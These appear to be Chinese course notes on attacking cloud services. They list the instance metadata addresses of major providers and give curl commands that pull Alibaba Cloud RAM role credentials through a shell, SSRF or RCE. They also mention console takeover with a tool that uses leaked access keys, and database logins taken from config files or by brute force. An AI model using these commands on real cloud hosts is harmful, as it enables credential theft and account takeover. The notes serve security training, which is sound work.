第94天:云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

1
2
3
4
5
6
7
各大云元数据地址
阿里云元数据地址:http://100.100.100.200/
腾讯云元数据地址:http://metadata.tencentyun.com/
华为云元数据地址:http://169.254.169.254/
亚马云元数据地址:http://169.254.169.254/
微软云元数据地址:http://169.254.169.254/
谷歌云元数据地址:http://metadata.google.internal/

关于云攻防的博客:https://wiki.teamssix.com/

在云计算和API访问中,AK/SK是常见的术语,分别代表访问密钥(Access Key, AK)和秘密密钥(Secret Key, SK)。它们用于身份验证和授权,确保只有经过授权的用户或应用程序可以访问云资源和服务。云主机密钥泄露(AK/SK)指的是访问密钥、秘密密钥或API密钥等凭证被公开或落入未经授权者之手。这些密钥通常用于认证和授权对云资源的访问,因此它们的泄露会导致严重危害

这里用阿里云进行举例:

1
https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata

image-20250904150212969

这里有两种方式一种是普通模式,一种是加固模式。如果是加固模式就没办法利用了。

1
2
3
4
5
6
7
8
#利用前提
需要有一个执行命令的权限,比如拿下了一个低权限的shell,或者使用ssrf,或者使用rce,这要可以使用命令执行的权限。

#利用过程
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ #这一步就会显示一个用户名
#假设获取的是ecs角色,那么利用的方式就是在后面加上获取的角色名
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

image-20250904150524221

image-20250904150541190

image-20250904150552717

小迪用的是命令行,现在有图形化的工具了

image-20250904151301993

命令行的工具

首先配置云服务商的访问密钥

image-20250904151526177

这三个值都要进行配置:

image-20250904151706596

下图是配置正确的样子。

image-20250904151843974

具体的使用手册:

1
https://wiki.teamssix.com/CF/

image-20250904152143806

image-20250904152527525

实战案例

image-20250904160116873

image-20250904160132456

image-20250904160147725

image-20250904160155914

image-20250904160206443

image-20250904160214767

image-20250904160226390

云数据库

image-20250904161101273

使用账号密码进行登陆,从源码配置中(几率高),或者爆破手段得到(几率低)